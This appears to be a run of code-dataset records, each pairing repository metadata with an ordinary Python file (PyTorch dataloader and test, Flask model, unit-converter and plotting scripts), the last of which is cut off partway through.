] | wangletian1995@126.com |
2288382d79d71af3c464745eab55071cec85c730 | 6f48b588ca15865325f23ea41cc86b5a04148928 | /dataloader.py | 087e2198a8a2f473b1bf6dd3121ed250f78feaa3 | [] | no_license | yihanzheng/DL2017-lab-03-master | 467833e374c6e74b49d3271c99325d857fe2a9a8 | 6521a7d96fc18fc7bdeba4b69a1e78a0dbc44879 | refs/heads/master | 2021-05-06T05:16:23.754041 | 2017-12-24T01:17:06 | 2017-12-24T01:17:06 | 115,071,461 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,605 | py | import torch
import torchvision
import torchvision.transforms as transforms
#load the training and testing data and transform data
class DataLoader(object):
    """Builds CIFAR-10 train/test loaders with standard augmentation.

    Downloads the dataset into `data_path` on first use (network I/O).
    """
    def __init__(self, data_path, batch_size, n_threads):
        self.data_path = data_path
        self.batch_size = batch_size
        self.n_threads = n_threads
        # Train-time augmentation: pad-and-crop + horizontal flip, then
        # normalize with the usual CIFAR-10 per-channel mean/std.
        transform_train = transforms.Compose(
            [transforms.RandomCrop(32, padding=4),
             transforms.RandomHorizontalFlip(),
             transforms.ToTensor(),
             transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])
        # Test-time: normalization only.
        transform_test = transforms.Compose(
            [transforms.ToTensor(),
             transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])
        # Fetch (and cache) the two dataset splits.
        trainset = torchvision.datasets.CIFAR10(root = self.data_path,train = True,
                                                download = True, transform = transform_train)
        testset = torchvision.datasets.CIFAR10(root = self.data_path,train = False,
                                                download = True, transform = transform_test)
        # Wrap in DataLoaders (shuffle training data only).
        self.train_loader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size,
                                                        shuffle = True, num_workers = self.n_threads)
        self.test_loader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size,
                                                       shuffle = False, num_workers = self.n_threads)
        # Human-readable class names, indexed by label id.
        self.classes = ('plane', 'car', 'bird', 'cat',
                        'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
    def getloader(self):
        """Return the (train_loader, test_loader) pair."""
        return self.train_loader, self.test_loader
"yihanzheng7@gmail.com"
] | yihanzheng7@gmail.com |
e27f61c97808942556f956f9422de14a5bd4a641 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/5/lFp.py | af044a654924c11751ea171e241dc87980eeaa4e | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
    # Python 2 code.  `lineRemaining` is a list of whitespace-split tokens;
    # a valid print payload is wrapped in standalone '"' tokens.
    if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
        if len(lineRemaining) > 2:
            # Drop the surrounding quote tokens and print the payload.
            lineRemaining = lineRemaining[1:-1]
            print ' '.join(lineRemaining)
        else:
            # Just the two quote tokens: print an empty line.
            print
def main(fileName):
    # Interpret the given file line by line: every line must start with the
    # 'lFP' keyword, otherwise the program prints ERROR and stops.
    with open(fileName) as f:
        for line in f:
            data = line.split()
            if data[0] == 'lFP':
                printFunction(data[1:])
            else:
                print 'ERROR'
                return
if __name__ == '__main__':
    # Usage: python lFp.py <source-file>
    main(sys.argv[1])
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
e078062f848f5fc1dd6c86f01b9d7e5b571cc9fe | 57329656e867c6b349852fb7772ec113e9aeaff0 | /models/store.py | 5bbfbdae2a4a4116331c1f1fb579ce490e894cd4 | [
"Apache-2.0"
] | permissive | aliyamullina/flask-restful-api | 9fe92f63a2c475c2a757474fcf6fb128725822ce | fc3b5cfd43144cecdf697fa03de55a3f0bce3932 | refs/heads/main | 2023-08-06T05:08:28.068170 | 2021-09-25T19:30:13 | 2021-09-25T19:30:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | from db import db
class StoreModel(db.Model):
    """SQLAlchemy model for a store that owns many items."""
    __tablename__ = "stores"

    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(80))
    # Lazy 'dynamic' relationship: `self.items` is a query, not a list.
    items = db.relationship("ItemModel", lazy="dynamic")

    def __init__(self, name):
        self.name = name

    def json(self):
        """Return a JSON-serializable dict with the store's items inlined."""
        # NOTE(review): "uuid" is resolved via an extra name lookup query;
        # if `self` is persisted this looks equivalent to `self.id` — verify.
        return {
            "name": self.name,
            "items": [item.json() for item in self.items.all()],
            "uuid": self.find_by_name(self.name).id,
        }

    @classmethod
    def find_by_name(cls, name):
        """Return the first store with the given name, or None."""
        return cls.query.filter_by(name=name).first()

    def save_to_db(self):
        # Insert or update this row and commit immediately.
        db.session.add(self)
        db.session.commit()

    def delete_from_db(self):
        # Delete this row and commit immediately.
        db.session.delete(self)
        db.session.commit()
| [
"berpress@gmail.com"
] | berpress@gmail.com |
87e9d19acc4b8071aec31cefba7589ce4fdd00e9 | f299c76607c643dea8ef06df118fec04d7976651 | /puller/pipeline.py | 19035665e9f9dbbd8f616d791e0b728b0580b2b3 | [] | no_license | warvariuc/trains | d90b410926c003b3fc6a9d327254677bf8754997 | 8e78cbca11f6da7f7067426bb659862628d44805 | refs/heads/master | 2021-01-19T13:33:14.049347 | 2014-03-24T12:24:42 | 2014-03-24T12:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | __author__ = 'Victor Varvariuc <victor.varvariuc@gmail.com>'
from .item import Item
from .spider import Spider
class ItemPipeline():
    """Base item pipeline.
    """
    def on_spider_started(self, spider):
        """Hook invoked when `spider` starts; default is a no-op."""
        pass
    def on_spider_finished(self, spider):
        """Hook invoked when `spider` finishes; default is a no-op."""
        pass
    def process_item(self, item, spider):
        """Process an `item` produced by `spider`; subclasses override this.

        NOTE(review): the asserts only type-check the arguments and are
        stripped when Python runs with -O.
        """
        assert isinstance(item, Item)
        assert isinstance(spider, Spider)
| [
"victor.varvariuc@gmail.com"
] | victor.varvariuc@gmail.com |
af2e4f1e4afdc10bff273aa9782e170c9b8a8c5c | 919df3ff896881ad8620984cbca59067f6212ad0 | /regym/tests/networks/policy_inference_actor_critic_test.py | 87bc7be4501df883fe3c9ed59ca3d342c14868d7 | [
"MIT"
] | permissive | Danielhp95/Regym | d84241347712d0984a7127d4841f7b2021fa72c0 | 64e02e143070ca6eb8bc8f898c431f59cd229341 | refs/heads/master | 2022-01-15T08:32:03.545858 | 2022-01-03T20:17:00 | 2022-01-03T20:17:00 | 162,127,100 | 12 | 5 | MIT | 2020-03-24T11:35:17 | 2018-12-17T12:26:31 | Python | UTF-8 | Python | false | false | 2,538 | py | import numpy as np
import torch
import torch.nn as nn
from tqdm import tqdm
from regym.networks.bodies import FCBody
from regym.networks.generic_losses import cross_entropy_loss
from regym.networks.heads import PolicyInferenceActorCriticNet
def test_can_learn_two_different_policies():
    """The net must fit a deterministic and a uniform target policy at once."""
    deterministic_target = torch.FloatTensor([[1., 0., 0.]])
    uniform_target = torch.FloatTensor([[1/3, 1/3, 1/3]])

    def make_body():
        # All three sub-networks share the same tiny 3->3 leaky-ReLU shape.
        return FCBody(state_dim=3, hidden_units=[3], gate=nn.functional.leaky_relu)

    net = PolicyInferenceActorCriticNet(
        num_policies=2,
        num_actions=3,
        feature_extractor=make_body(),
        policy_inference_body=make_body(),
        actor_critic_body=make_body())

    train_model(net, deterministic_target, uniform_target)
    _test_model(net, deterministic_target, uniform_target)
def train_model(model, target_policy_1, target_policy_2):
    """Train `model` so its two policy heads match the given target policies.

    Runs 1500 Adam steps (lr=5e-4) on random 3-dim inputs; the loss is the
    sum of the cross-entropy between each policy head ('policy_0'/'policy_1'
    entries of the model's output dict) and its target distribution.

    :param model: network whose forward pass returns a dict with
                  'policy_0' and 'policy_1' entries
    :param target_policy_1: target distribution for head 0, shape (1, 3)
    :param target_policy_2: target distribution for head 1, shape (1, 3)
    """
    optimizer = torch.optim.Adam(model.parameters(), lr=5e-4)
    training_steps = 1500
    progress_bar = tqdm(range(training_steps))
    for _ in progress_bar:
        input_tensor = torch.rand(size=(1, 3))
        prediction = model(input_tensor)
        # Fix: dropped the unused `from torch.nn.functional import kl_div`
        # that was re-imported on every iteration of the original loop.
        cross_entropy_loss_1 = cross_entropy_loss(model_prediction=prediction['policy_0'], target=target_policy_1.unsqueeze(0))
        cross_entropy_loss_2 = cross_entropy_loss(model_prediction=prediction['policy_1'], target=target_policy_2.unsqueeze(0))
        total_loss = cross_entropy_loss_1 + cross_entropy_loss_2
        optimizer.zero_grad()
        total_loss.backward()
        optimizer.step()
        progress_bar.set_description(
            'L1: {}\tL2: {}'.format(
                cross_entropy_loss_1, cross_entropy_loss_2))
def _test_model(model, target_policy_1, target_policy_2):
test_steps = 100
for _ in range(test_steps):
input_tensor = torch.rand(size=(1, 3))
prediction = model(input_tensor)
pred_1 = prediction['policy_0'].detach().numpy()
pred_2 = prediction['policy_1'].detach().numpy()
np.testing.assert_array_almost_equal(pred_1, target_policy_1.numpy(), decimal=1)
np.testing.assert_array_almost_equal(pred_2, target_policy_2.numpy(), decimal=1)
| [
"danielhp95@gmail.com"
] | danielhp95@gmail.com |
c3438cfc2e58585f56186596756b732197d47003 | ad0ece878bf7dfd2368a5bb2093acc37a1fece66 | /bt5/erp5_officejs_appstore_base/SkinTemplateItem/portal_skins/erp5_officejs_appstore_base/SoftwareProduct_updateApplication.py | 05e6320255a275bd0183d890d255365a9b3436a3 | [] | no_license | kingkazmam/erp5 | 3842cb0353906d211edaef6597ba8d7d1dc48570 | ec40f658a8fcdbb672c359e30bfa96b35c05ee03 | refs/heads/master | 2020-04-02T13:21:40.813593 | 2018-10-22T05:41:27 | 2018-10-24T08:12:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | return context.ERP5Site_createNewSoftwarePublication(
file=file,
product_line="software/application",
title=context.getTitle(),
version_title= str(DateTime()),
changelog=changelog,
description="",
software_product=context.getRelativeUrl(),
**kw
)
| [
"vincent.bechu@nexedi.com"
] | vincent.bechu@nexedi.com |
8c85e7bc65aa6b0897b818780e5d9dbab7ac662d | 2f26a1772d3a298ca24fa219cdd9986e236df10a | /TriblerGUI/defs.py | 7a640f879a0bc6ee54f7ac86e441e44ad57606ac | [] | no_license | devos50/TriblerGUI | 4715e16ad1ca82b8971c71ec01ec43856c80cc7d | 92defabcc496d21e7ba8844cf6d21b296559ee98 | refs/heads/master | 2021-01-10T11:58:44.835055 | 2016-05-01T14:26:14 | 2016-05-01T14:26:14 | 52,109,082 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,066 | py | # Define stacked widget page indices
PAGE_HOME = 0
PAGE_MY_CHANNEL = 1
PAGE_SEARCH_RESULTS = 2
PAGE_CHANNEL_DETAILS = 3
PAGE_SETTINGS = 4
PAGE_VIDEO_PLAYER = 5
PAGE_SUBSCRIBED_CHANNELS = 6
PAGE_DOWNLOADS = 7
PAGE_CHANNEL_CONTENT = 0
PAGE_CHANNEL_COMMENTS = 1
PAGE_CHANNEL_ACTIVITY = 2
PAGE_MY_CHANNEL_OVERVIEW = 0
PAGE_MY_CHANNEL_SETTINGS = 1
PAGE_MY_CHANNEL_TORRENTS = 2
PAGE_MY_CHANNEL_PLAYLISTS = 3
PAGE_MY_CHANNEL_RSS_FEEDS = 4
PAGE_SETTINGS_GENERAL = 0
PAGE_SETTINGS_CONNECTION = 1
PAGE_SETTINGS_BANDWIDTH = 2
PAGE_SETTINGS_SEEDING = 3
PAGE_SETTINGS_ANONYMITY = 4
# Definition of the download statuses and the corresponding strings
DLSTATUS_ALLOCATING_DISKSPACE = 0
DLSTATUS_WAITING4HASHCHECK = 1
DLSTATUS_HASHCHECKING = 2
DLSTATUS_DOWNLOADING = 3
DLSTATUS_SEEDING = 4
DLSTATUS_STOPPED = 5
DLSTATUS_STOPPED_ON_ERROR = 6
DLSTATUS_METADATA = 7
DLSTATUS_CIRCUITS = 8
DLSTATUS_STRINGS = ["Allocating disk space", "Waiting for check", "Checking", "Downloading", "Seeding", "Stopped",
"Stopped on error", "Waiting for metadata", "Building circuits"]
# Definitions of the download filters. For each filter, it is specified which download statuses can be displayed.
DOWNLOADS_FILTER_ALL = 0
DOWNLOADS_FILTER_DOWNLOADING = 1
DOWNLOADS_FILTER_COMPLETED = 2
DOWNLOADS_FILTER_ACTIVE = 3
DOWNLOADS_FILTER_INACTIVE = 4
DOWNLOADS_FILTER_DEFINITION = {
DOWNLOADS_FILTER_ALL: [DLSTATUS_ALLOCATING_DISKSPACE, DLSTATUS_WAITING4HASHCHECK, DLSTATUS_HASHCHECKING,
DLSTATUS_DOWNLOADING, DLSTATUS_SEEDING, DLSTATUS_STOPPED, DLSTATUS_STOPPED_ON_ERROR,
DLSTATUS_METADATA, DLSTATUS_CIRCUITS],
DOWNLOADS_FILTER_DOWNLOADING: [DLSTATUS_DOWNLOADING],
DOWNLOADS_FILTER_COMPLETED: [DLSTATUS_SEEDING],
DOWNLOADS_FILTER_ACTIVE: [DLSTATUS_ALLOCATING_DISKSPACE, DLSTATUS_WAITING4HASHCHECK, DLSTATUS_HASHCHECKING,
DLSTATUS_DOWNLOADING, DLSTATUS_SEEDING, DLSTATUS_METADATA, DLSTATUS_CIRCUITS],
DOWNLOADS_FILTER_INACTIVE: [DLSTATUS_STOPPED, DLSTATUS_STOPPED_ON_ERROR]
}
| [
"martijn@code-up.nl"
] | martijn@code-up.nl |
f6533124b5415fa799a1d77d1c4ef0d8c14ec654 | 77b0067191267176cf868b0261133d13429aeb70 | /avaliacoes/admin.py | 5ed4192425dc1edfe2f634c00b6c1799626a7a02 | [] | no_license | marcossouz/django-rest-framework | 92cd945d8e96e815f88c985a2b0a8bc1107d235e | 70fd911b99ef511a3d77ab58dfeeea50b913e11c | refs/heads/master | 2023-04-28T18:00:09.414938 | 2022-04-24T15:36:48 | 2022-04-24T15:36:48 | 202,238,713 | 2 | 0 | null | 2023-04-21T20:35:46 | 2019-08-13T23:39:12 | Python | UTF-8 | Python | false | false | 95 | py | from django.contrib import admin
from .models import Avaliacao
admin.site.register(Avaliacao) | [
"mrcsz.m@gmail.com"
] | mrcsz.m@gmail.com |
bc7e6918b6630b409153c0d84d6feefc8425c2b6 | fd67592b2338105e0cd0b3503552d188b814ad95 | /test/test_models/test_ping.py | 61773ff5dfcc00185b57a32a4230151250581dbc | [] | no_license | E-goi/sdk-python | 175575fcd50bd5ad426b33c78bdeb08d979485b7 | 5cba50a46e1d288b5038d18be12af119211e5b9f | refs/heads/master | 2023-04-29T20:36:02.314712 | 2023-04-18T07:42:46 | 2023-04-18T07:42:46 | 232,095,340 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,002 | py | # coding: utf-8
"""
APIv3 (New)
# Introduction This is our new version of API. We invite you to start using it and give us your feedback # Getting Started E-goi can be integrated with many environments and programming languages via our REST API. We've created a developer focused portal to give your organization a clear and quick overview of how to integrate with E-goi. The developer portal focuses on scenarios for integration and flow of events. We recommend familiarizing yourself with all of the content in the developer portal, before start using our rest API. The E-goi APIv3 is served over HTTPS. To ensure data privacy, unencrypted HTTP is not supported. Request data is passed to the API by POSTing JSON objects to the API endpoints with the appropriate parameters. BaseURL = api.egoiapp.com # RESTful Services This API supports 5 HTTP methods: * <b>GET</b>: The HTTP GET method is used to **read** (or retrieve) a representation of a resource. * <b>POST</b>: The POST verb is most-often utilized to **create** new resources. * <b>PATCH</b>: PATCH is used for **modify** capabilities. The PATCH request only needs to contain the changes to the resource, not the complete resource * <b>PUT</b>: PUT is most-often utilized for **update** capabilities, PUT-ing to a known resource URI with the request body containing the newly-updated representation of the original resource. * <b>DELETE</b>: DELETE is pretty easy to understand. It is used to **delete** a resource identified by a URI. # Authentication We use a custom authentication method, you will need a apikey that you can find in your account settings. 
Below you will see a curl example to get your account information: #!/bin/bash curl -X GET 'https://api.egoiapp.com/my-account' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' Here you can see a curl Post example with authentication: #!/bin/bash curl -X POST 'http://api.egoiapp.com/tags' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' \\ -H 'Content-Type: application/json' \\ -d '{`name`:`Your custom tag`,`color`:`#FFFFFF`}' # SDK Get started quickly with E-goi with our integration tools. Our SDK is a modern open source library that makes it easy to integrate your application with E-goi services. * <a href='https://github.com/E-goi/sdk-java'>Java</a> * <a href='https://github.com/E-goi/sdk-php'>PHP</a> * <a href='https://github.com/E-goi/sdk-python'>Python</a> * <a href='https://github.com/E-goi/sdk-ruby'>Ruby</a> * <a href='https://github.com/E-goi/sdk-javascript'>Javascript</a> * <a href='https://github.com/E-goi/sdk-csharp'>C#</a> # Stream Limits Stream limits are security mesures we have to make sure our API have a fair use policy, for this reason, any request that creates or modifies data (**POST**, **PATCH** and **PUT**) is limited to a maximum of **20MB** of content length. If you arrive to this limit in one of your request, you'll receive a HTTP code **413 (Request Entity Too Large)** and the request will be ignored. To avoid this error in importation's requests, it's advised the request's division in batches that have each one less than 20MB. # Timeouts Timeouts set a maximum waiting time on a request's response. Our API, sets a default timeout for each request and when breached, you'll receive an HTTP **408 (Request Timeout)** error code. You should take into consideration that response times can vary widely based on the complexity of the request, amount of data being analyzed, and the load on the system and workspace at the time of the query. 
When dealing with such errors, you should first attempt to reduce the complexity and amount of data under analysis, and only then, if problems are still occurring ask for support. For all these reasons, the default timeout for each request is **10 Seconds** and any request that creates or modifies data (**POST**, **PATCH** and **PUT**) will have a timeout of **60 Seconds**. Specific timeouts may exist for specific requests, these can be found in the request's documentation. # Callbacks A callback is an asynchronous API request that originates from the API server and is sent to the client in response to a previous request sent by that client. The API will make a **POST** request to the address defined in the URL with the information regarding the event of interest and share data related to that event. <a href='/usecases/callbacks/' target='_blank'>[Go to callbacks documentation]</a> ***Note:*** Only http or https protocols are supported in the Url parameter. <security-definitions/> # noqa: E501
The version of the OpenAPI document: 3.0.0
Generated by: https://openapi-generator.tech
"""
import unittest
import egoi_api
from egoi_api.model.ping import Ping
from egoi_api import configuration
class TestPing(unittest.TestCase):
    """Ping unit test stubs"""
    # Shared API client configuration for the (not yet written) Ping tests.
    # NOTE(review): this generated stub declares no test_* methods, so the
    # suite currently passes vacuously.
    _configuration = configuration.Configuration()

if __name__ == '__main__':
    unittest.main()
| [
"integrations@e-goi.com"
] | integrations@e-goi.com |
e4cb79168d0d6aef400b62c1a4c2050bdec9689c | d0ec423a9bf21957d51f9530e0761d74031c972c | /03_Fahrenheit_To_Celsius_testv2.py | 8f22fb31d149a6a8a94923db0d6b8e499cf87480 | [] | no_license | NathanM3/Temperature-Converter | e9207ca4834de1ab820b4caa26a2bb5899fc14b7 | 4a274bab5e9306e14058833559524b9258c9ccf4 | refs/heads/main | 2023-06-26T18:23:48.961984 | 2021-07-24T09:20:00 | 2021-07-24T09:20:00 | 377,973,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,128 | py | """ Converting Fahrenheit to Celsius v2
Converting from degrees Fahrenheit to Celsius
Function takes in a value, does the conversion and puts answer into a list
Testing different ways of rounding that I can apply to both parts of comp 3
"""
def to_c(from_f):
    """Convert a Fahrenheit temperature to Celsius.

    Whole-number results come back as int; everything else is rounded
    to one decimal place and returned as float.
    """
    celsius = (from_f - 32) * 5 / 9
    # Method 1 of rounding numbers - checking if it has any decimals
    return int(celsius) if celsius % 1 == 0 else round(celsius, 1)
def to_c_round_v2(from_f):
    """Convert Fahrenheit to Celsius and return the result as a string.

    Whole numbers are rendered without decimals, otherwise one decimal
    place is kept.
    """
    celsius = (from_f - 32) * 5 / 9
    # Method 2 of rounding numbers - sending them into a formatted string
    template = "{:.0f}" if celsius % 1 == 0 else "{:.1f}"
    return template.format(celsius)
# Main Routine
temperatures = [0, 32, 100]
converted = []
converted2 = []
for temp in temperatures:
    # Build one answer sentence per rounding method for each temperature.
    converted.append("{} degrees F is {} degrees C".format(temp, to_c(temp)))
    converted2.append("{} degrees F is {} degrees C".format(temp, to_c_round_v2(temp)))
print(converted)
print(converted2)
| [
"morrisonn2@middleton.school.nz"
] | morrisonn2@middleton.school.nz |
8d9b4873c643e06fd464ef9641252d22cd83a016 | fb15cf74d78ed1511e4a0ec85fb397cb59ba655c | /RandomArtGenerator/pixels.py | 0a014d66ed18a5a448fc15e8c52dacdcdac078ab | [] | no_license | niturobert/RandomArtGenerator | 70a16761938b8aff5c9d170dac2f4a6e26b47b17 | 707455ddba2b5e81720c5bb009d71dd01ffa1524 | refs/heads/master | 2023-06-22T04:42:40.090647 | 2021-07-17T13:13:50 | 2021-07-17T13:13:50 | 386,941,959 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | """
Semplice algoritmo di scrittura.
"""
from PIL import Image, ImageDraw
from random import randint
from config import *
# Edge length (in pixels) of each coloured square in the grid.
SQUARE_SIZE = 8
# Paint the canvas with a grid of randomly coloured squares, then display it.
# IMAGE_WIDTH / IMAGE_HEIGHT come from the star-import of `config` -- TODO confirm.
with Image.new('RGB', (IMAGE_WIDTH, IMAGE_HEIGHT)) as image:
    draw = ImageDraw.Draw(image)
    for y in range(0, IMAGE_HEIGHT, SQUARE_SIZE):
        for x in range(0, IMAGE_WIDTH, SQUARE_SIZE):
            # Each cell gets an independent random RGB fill.
            draw.rectangle([(x, y), (x + SQUARE_SIZE, y + SQUARE_SIZE)], fill=(randint(0, 255), randint(0, 255), randint(0, 255)))
    image.show()
"nitu.robert.georgian@gmail.com"
] | nitu.robert.georgian@gmail.com |
8969006cf82f736e5a60bd8c29710cd5a996c994 | c8f5d69d21ac4df40d79a811dea2e3ad82fb5e04 | /src/csv2plot.py | a731eff829805f1ba98f1ab6013855d44df4bc50 | [] | no_license | webclinic017/usstock | e71ab18534fd3afc05ab2452578821584750e2b9 | c724f00bc1c5d2a41ee58e037ba0b1b3f0904f70 | refs/heads/master | 2023-08-15T05:22:14.275202 | 2021-10-14T21:19:53 | 2021-10-14T21:19:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,608 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Description: plot time series from a csv file
Usage of:
csv2plot.py file --sep=DELIMITER
Example:
# FROM data file
python csv2plot.py csv2plot.dat
# OR (near realtime data)
iex_types_batch.py --types=chart --range=1d --no_database_save AAPL | csv2plot.py - --columns=close,epochs --xaxis=epochs --title=Apple
# OR (daily data)
iex_types_batch.py --types=chart --range=3m --no_database_save AAPL | csv2plot.py - --columns=open,close,pbdate --xaxis=pbdate --title=Apple
# OR (daily return since inception )
iex_types_batch.py --types=chart --range=3m --no_database_save AAPL | csv2plot.py - --columns=open,close,pbdate --xaxis=pbdate --title=Apple --return_since_inception
# OR (pivot data)
printf "select m.label as ticker,p.close as price,p.pbdate from prc_hist p,mapping_series_label m where p.name in ('^GSPC','^TWII','000001.SS','^SOX','^DJI') and p.pbdate>20170101 and p.name=m.series order by m.label,p.pbdate" | psql.sh -d ara | grep -v rows | python2 csv2plot.py --pivot_group=ticker --pivot_value=price --title='Market Overview 2018-05-25' --interpolate --return_since_inception -
# OR (pivot data and near realtime per minute)
iex_types_batch.py --types=chart --range=1d --no_database_save AAPL XLK SPY| csv2plot.py - --columns=ticker,close,epochs --xaxis=epochs --pivot_group=ticker --pivot_value=close --title='Market Closing Overview' --interpolate --return_since_inception --trendline
# OR (pivot data with minute data)
python csv2plot.py AAPL_XLK_SPY.dat --columns=ticker,close,epochs --xaxis=epochs --pivot_group=ticker --pivot_value=close --title='Market Closing Overview' --interpolate --return_since_inception --trendline
# OR (stock data with --src)
csv2plot.py IBM --src=iex --columns=close,open,pbdate --days=90
# OR (fred data with --src)
csv2plot.py DGS2 --src=fred --columns=close,pbdate
# OR (stock data with --src and candlestick graph)
csv2plot.py IBM --src=iex --columns=close,open,high,low,volume,pbdate --title="IBM OHLC" --days=90 --ohlc
# OR (minute data and candlestick graph)
iex_types_batch.py --types=chart --range=1d --no_database_save --output=csv AAPL| csv2plot.py - --columns=close,open,high,low,volume,epochs,ticker --ohlc --title="Intraday AAPL OHLC" --xaxis=epochs --trendline
# OR (minute data and candlestick Combo graph)
iex_types_batch.py --types=chart --range=1d --no_database_save --output=csv AAPL| csv2plot.py - --columns=ticker,close,open,high,low,volume,epochs --ohlc_combo --title="Intraday AAPL" --xaxis=epochs --trendline
Note: return_since_inception will use $1 as the initial investment if the initial is less than $1
Last mod., Sat Oct 27 20:50:18 EDT 2018
"""
import sys
from optparse import OptionParser
from datetime import datetime
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.image as mimage
import matplotlib.ticker as mticker
import pandas as pd
from scipy.interpolate import interp1d
#font_name = "AR PL UKai CN"
#matplotlib.rcParams['font.family'] = font_name
#matplotlib.rcParams['axes.unicode_minus']=False # in case minus sign is shown as box
import matplotlib.font_manager as mfm
#font_path = "/usr/share/fonts/truetype/arphic/ukai.ttc"
font_path = "/usr/share/fonts/truetype/arphic/uming.ttc"
#font_path = "/usr/share/fonts/truetype/droid/DroidSansFallbackFull.ttf" #Droid Sans Fallback
prop = mfm.FontProperties(fname=font_path)
#prop = mfm.FontProperties()
plt.style.use('dark_background')
# Python-2/3 shim: under Python 2 force the default string encoding to utf-8
# (presumably for the CJK font text used in this module -- TODO confirm) and
# pick the matching StringIO implementation for each major version.
if sys.version_info.major == 2:
	reload(sys)
	sys.setdefaultencoding('utf8')
	from cStringIO import StringIO
else:
	from io import StringIO
#----------------------------------------------------------------#
def subDict(myDict, kyLst, reverseTF=False):
	"""Return a shallow copy of `myDict` restricted to the keys in `kyLst`.

	:param myDict: source dict
	:param kyLst: keys to select (or to drop when `reverseTF` is True)
	:param reverseTF: invert-match; when True keep only keys NOT in kyLst
	:return: new dict with the selected key/value pairs
	"""
	kySet = set(kyLst)  # O(1) membership test instead of a list scan per key
	if reverseTF:  # invert-match, select non-matching [kyLst] keys
		return {ky: va for ky, va in myDict.items() if ky not in kySet}
	return {ky: va for ky, va in myDict.items() if ky in kySet}
def ymd_parser(x, fmt='%Y%m%d'):
	"""Parse a date-like value (e.g. 20180525) into a datetime via strptime."""
	return datetime.strptime(str(x), fmt)

def epoch_parser(x, s=1000):
	"""Convert an epoch timestamp (milliseconds by default) to a local datetime."""
	return datetime.fromtimestamp(int(x / s))
def extrapolate_series(yo):
	"""Fill/extend missing values of series `yo` by linear inter/extrapolation.

	Fits scipy interp1d on the non-NaN points (keyed by the series' integer
	index values) and evaluates it over the full index.
	NOTE(review): relies on Python 2 `map` returning a list; under Python 3
	interp1d would receive map objects -- confirm before porting.
	"""
	yg=yo.dropna()
	fn = interp1d(map(int,yg.index.values), yg.values, fill_value='extrapolate')
	return fn(map(int,yo.index.values))
def get_csvdata(args,sep='|',src=None,days=730,start=None,end=None,columns=None,hdrLst=None):
	"""
	Get data in datafram with selected [columns]

	`args` is either a DataFrame (used as-is) or an argv-style list whose
	first element is a filename, '-' for stdin, or a ticker/series name
	when `src` is given.  `columns` is a comma-separated subset of columns
	to keep; `hdrLst` renames columns via the "old1,old2=new1,new2" syntax.
	Returns a DataFrame, None when no args were supplied, or {} when the
	source yielded no rows.  (Python 2 code: uses `print >>` statements.)
	"""
	# Case 1: caller already passed a DataFrame -- just subset/rename it.
	if isinstance(args,pd.DataFrame):
		df = args
		if columns is not None and df.size > 0:
			df = df[ list(set(df.columns) & set(columns.split(','))) ]
		if hdrLst is not None:
			xLst,yLst = hdrLst.split('=')
			xyD = dict(zip(xLst.split(','),yLst.split(',')))
			df.rename(columns=xyD,inplace=True)
		return df
	if len(args)<1:
		return None
	filename=args[0]
	# Case 2: load from stdin, a remote data source, or a local CSV file.
	if filename=='-':
		df=pd.read_csv(sys.stdin,sep=sep)
	elif src is not None:
		from _alan_calc import pull_stock_data
		# NOTE(review): if pull_stock_data returns None, df.size below raises.
		df = pull_stock_data(filename,days=days,src=src,start=start,end=end)
	else:
		df = pd.read_csv(filename,sep=sep)
	if df.size < 1:
		print >> sys.stderr, "**ERROR: Data not found!"
		return {}
	if columns is not None:
		df = df[ list(set(df.columns) & set(columns.split(','))) ]
	df.dropna(inplace=True)
	if hdrLst is not None:
		xLst,yLst = hdrLst.split('=')
		xyD = dict(zip(xLst.split(','),yLst.split(',')))
		df.rename(columns=xyD,inplace=True)
	return df
def dataj2ts(ts, df, opts=None):
	"""Render jinja2 template string `ts` with dataframe `df` exposed as `f`.

	:param ts: jinja2 template script string
	:param df: DataFrame made available to the template as variable `f`
	:param opts: option dict whose entries (except 'j2ts') are passed through
	:return: rendered string, or '' when `ts` is missing/too short or `df` is empty
	"""
	from _alan_str import jj_fmt
	# pass through every option except the template itself ('j2ts')
	dd = subDict(opts or {}, ['j2ts'], reverseTF=True)
	if df.size > 0 and ts is not None and len(ts) > 1:
		# fix: original `dd=update(f=df)` raised NameError and discarded dd
		dd.update(f=df)
		return jj_fmt(ts, dd)
	else:
		return ''
def run_csv2plot(args,opts=None,optx=None):
	"""
	plot time series data from csv file

	`args` is an argv-style list (or DataFrame) handed to get_csvdata();
	`opts` is the option dict from opt_csv2plot(), optionally overridden by
	`optx`.  Returns the plotted DataFrame (the run_tech result for the
	OHLC-combo path), or None when no data could be loaded.
	NOTE(review): option values are injected into the local namespace via
	`exec` below, which only works as intended under Python 2.
	"""
	#- Set input parameters
	if opts is None:
		opts, _ = opt_csv2plot([])
	if optx is not None:
		opts.update(optx)
